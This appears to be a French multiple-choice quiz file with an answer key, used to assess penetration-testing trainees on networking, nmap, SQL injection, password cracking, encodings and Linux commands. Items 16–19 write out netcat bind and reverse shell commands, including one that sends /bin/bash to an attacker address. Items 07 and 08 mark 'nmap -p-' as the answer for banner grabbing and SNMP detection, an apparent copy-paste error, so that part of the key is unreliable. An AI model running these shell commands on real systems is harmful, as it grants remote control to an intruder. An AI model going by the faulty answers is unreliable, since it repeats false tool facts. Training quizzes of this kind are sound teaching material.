[Intro]
theme: Training
category: Eval01
label: Evaluation
description: 
    Evaluation des acquis




#
#   
#
[01]
name: Password  
value: 1
category:  Eval01
type: QCM
description:
    Lequel de ces mots de passe est le plus sécurisé
QCM:
    - ada
    - G6*!9
    + lelundi31jaiaquaponey
    - Robert56$


#
#   
#
[02]
name: Bruteforce  
value: 1
category:  Eval01
type: QCM
description:
    Quels outils utilisent des méthodes de bruteforce
QCM:
    + john
    + hydra
    - ping
    - nginx



#
#   
#
[03]
category:  Eval01
name: TCP  
value: 1
type: QCM
description:
    Le message SYN-ACK
QCM:
    + Est le second message du 3-way handshake de TCP
    + Est la réponse du serveur TCP à un SYN
    - Est la réponse à un ACK


#
#   
#
[04]
category:  Eval01
name: TCP 2 
value: 1
type: QCM
description:
    Le sessage SYN contient seq: 100. Le message SYN-ACK va contenir
QCM:
    + Seq:xxx  Ack: 101
    - Seq:100  Ack:100
    - Seq: 101 Ack: 200



#
#   
#
[05]
category:  Eval01
name: Ping
value: 1
type: QCM
description:
    Ping utilise ICMP qui est encapsulé dans  :
QCM:
    - TCP
    - UDP
    + IP


#
#   
#
[06]
category:  Eval01
name: Ping 2
value: 1
type: QCM
description:
    Traceroute utilise ICMP et fait varier le champ:
QCM:
    - ICMP Checksum
    - ICMP Code
    + IP TTL
    - ICMP Type


#
#   
#
[07]
category:  Eval01
name: Nmap 
value: 1
type: QCM
description:
    Je veux lire les bannières des serveurs: 
QCM:
    - nmap -sV bob.com
    + nmap -p- bob.com
    - nmap -sU -p 161 bob.com
    


#
#   
#
[08]
category:  Eval01
name: Nmap 
value: 1
type: QCM
description:
    Je veux détecter le service SNMP: 
QCM:
    - nmap -sV bob.com
    + nmap -p- bob.com
    - nmap -sU -p 161 bob.com
    


#
#   
#
[09]
category:  Eval01
name: Nmap 
value: 1
type: QCM
description:
    Je veux scanner tous les ports 
QCM:
    - nmap -sV bob.com
    + nmap -p- bob.com
    - nmap -sU -p 161 bob.com
     

#
#   
#
[10]
category:  Eval01
name: SQLi 
value: 1
type: QCM
description:
    Une SQLi est
QCM:
    + Une injection de commandes SQL grace à des paramètres modifiables par l'utilisateur
    - Une injection de commandes Shell grace à des paramètres modifiables par l'utilisateur
    - due a une base de données non patchée
    - dangereux uniquement si la base de donnée a les droits root




#
#   
#
[11]
category:  Eval01
name: SQLi 
value: 1
type: QCM
description:
    Quel caractère utiliser pour détecter une SQLi ?
QCM:
    + '
    - ;
    - :
    - (




#
#   
#
[12]
category:  Eval01
name: SQLi 
value: 1
type: QCM
description:
    Quels mots de passe sont dans le top 10 de rockyou ?
QCM:
    + 123456
    + password
    + iloveyou
    + princess
    - robert
    - superman




#
#   
#
[13]
category:  Eval01
name: SQLi 
value: 1
type: QCM
description:
    Quel mot de passe a pour md5 8afa847f50a716e64932d995c8e7435a ?
QCM:
    - 123456
    - password
    - iloveyou
    + princess
    - robert
    - superman




#
#   
#
[14]
category:  Eval01
name: SQLi 
value: 1
type: QCM
description:
    A quoi sert l'option -i dans la commande ssh -i xxxxx root@victim.com ?
QCM:
    - a bypasser le check de certificat
    + a utiliser une cef privée plutot qu'un mot de passe
    - a utiliser le protocole HTTPS



#
#   
#
[15]
category:  Eval01
name: SQLi 
value: 1
type: QCM
description:
    A quoi sert l'option HTTP Only dans un cookie ?
QCM:
    - a ne pas utiliser HTTPS
    + a interdire l'accès à ce cookie en Javascript
    - a utiliser le protocole HTTPS


#
#   
#
[16]
category:  Eval01
name: Netcat 
value: 1
type: QCM
description:
    Je veux lancer un bind shell en écoute sur le port 4444
QCM:
    - nc -lvp 4444
    + nc  -e /bin/bash -lvp 4444
    - nc victim.com 4444
    - nc -e /bin/bash victim.com 4444



#
#   
#
[17]
category:  Eval01
name: Netcat 
value: 1
type: QCM
description:
    Je veux lancer un netcat en écoute sur le port 4444 et attendre un reverse shell
QCM:
    + nc -lvp 4444
    - nc  -e /bin/bash -lvp 4444
    - nc victim.com 4444
    - nc -e /bin/bash victim.com 4444


#
#   
#
[18]
category:  Eval01
name: Netcat 
value: 1
type: QCM
description:
    Je veux me connecter à un bind shell qui tourne sur victim.com
QCM:
    - nc -lvp 4444
    - nc  -e /bin/bash -lvp 4444
    + nc victim.com 4444
    - nc -e /bin/bash victim.com 4444



#
#   
#
[19]
category:  Eval01
name: Netcat 
value: 1
type: QCM
description:
    Je veux lancer un reverse shell vers ma kali qui est en écoute sur le port 4444
QCM:
    - nc -lvp 4444
    - nc  -e /bin/bash -lvp 4444
    - nc victim.com 4444
    + nc -e /bin/bash 10.10.2.22 4444




#
#   
#
[20]
category:  Eval01
name: CVE 
value: 1
type: QCM
description:
    CVE veut dire 
QCM:
    + Common Vulnerabilities and Exposures
    - Common Vuln and Exploits
    - Check Vulnerabilities and Exposures


#
#   
#
[21]
category:  Eval01
name: CVE 2 
value: 1
type: QCM
description:
    La CVE CVE-2014-6271 s'appelle 
QCM:
    + Shellshock
    - Dirty Cow
    - Drupalguedon
    - Spectre


#
#   
#
[22]
category:  Eval01
name: CVE 3 
value: 1
type: QCM
description:
    La CVE CVE-2014-6271 a été émise en 
QCM:
    + 2014
    - 2015
    - 2013
    - 2009




#
#   
#
[23]
category:  Eval01
name: Encodage 
value: 1
type: QCM
description:
    ZWRyZnlodWpvbA== est caractéristique de l'encodage
QCM:
    - hexadecimal
    - unicode
    + base64
    - octal


#
#   
#
[24]
category:  Eval01
name: Encodage 
value: 1
type: QCM
description:
    ZWRyZnlodWpvbA== se décode
QCM:
    - edyhedrfi
    - sxdcvfderf
    - olpmujgbh
    + edrfyhujol



#
#   
#
[25]
category:  Eval01
name: Find 
value: 1
type: QCM
description:
    find / -name flag*.txt 2>/dev/null 
QCM:
    + affiche flag_admin.txt s'il est lisible
    - affiche /root/root.txt s'il est lisible
    + n'affiche pas les messages d'erreurs
    - affiche tous les fichiers lisibles à partir de la racine
    + affiche /home/robert/flag_easy.txt s'il est lisible




#
#   
#
[26]
category:  Eval01
name: Su 
value: 1
type: QCM
description:
    su
QCM:
    + permet de changer de compte si on connait le mote de passe
    - permet d'exploiter un sticky bit
    + n'est pas exploitable directement à partir de netcat. Il nécessite une manip en python pour obtenir un tty.
    - permet de se connecter à distance





#
#   
#
[27]
category:  Eval01
name: LFI 
value: 1
type: QCM
description:
    Une LFI
QCM:
    + est une Local File Inclusion
    + permet de lire voire executer un fichier arbitraire du serveur
    + Fonctionne tres bien avec de l'upload de fichier
    - nécessite une base de donnée



#
#   
#
[28]
category:  Eval01
name: LFI 
value: 1
type: QCM
description:
    Je veux lancer un serveur web local pour transférer un fichier
QCM:
    + python -m SimpleHTTPServer
    - nc -lvp 80
    + php -S localhost:8000 -t foo/
    + je lance apache dans un docker en mountant le répertoire local








